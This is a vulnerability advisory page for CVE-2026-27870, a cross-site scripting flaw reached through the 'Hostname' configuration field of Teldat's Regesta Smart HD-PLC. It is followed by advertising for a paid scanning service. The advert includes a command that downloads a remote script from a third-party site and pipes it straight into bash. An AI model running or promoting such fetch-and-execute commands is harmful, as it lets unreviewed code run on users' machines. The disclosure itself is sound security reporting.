CVE-2026-27870
Published: Wed, 17 Jun 2026 13:20
Summary
An attacker with access via network to the Regesta Smart HD-PLC of the provider Teldat (in this case, registration action IS required) who has the vulnerable software could, introduce arbitrary JavaSc
Details
An attacker with access via network to the Regesta Smart HD-PLC of the provider Teldat (in this case, registration action IS required) who has the vulnerable software could, introduce arbitrary JavaScript by injecting a Cross-site Scripting (XSS) payload into the 'Hostname' field of the configuration file resulting in a XSS in the path /upgrade/query.php?cmd=p+3%3Bversion. This issue affects Regesta Smart HD-PLC - TLDPH16D2: 11.02.05.10.02.
Are YOU affected by CVE-2026-27870?
5-second check on your actual server. Reads /etc/os-release, uname -r, and dpkg-query; matches against the live USN + Debian Security Tracker feeds; tells you whether CVE-2026-27870 (and any other live CVE) applies. Anonymous, no signup.
curl https://mindsparkstack.com/scan.sh | bash
References
- https://support.teldat.com/images/content/docs/Teldat_dm1087_regesta_smart_nessum_series_installation(1).pdf
- https://support.teldat.com/portal/supportcontent?page=cgs-customer-global-support&none=true&language=en-US
- https://www.hackrtu.com/blog/CNA-CVE-2026-27870/
- https://www.hackrtu.com/blog/CNA-HRTU-0002/
- https://www.teldat.com/es/
StackPatch runs this match against YOUR installed packages every hour
Free (3 servers) / from $9/mo (14-day free trial) / Solo $9/mo / Pro $29/mo / Team $79/mo. Indie pricing.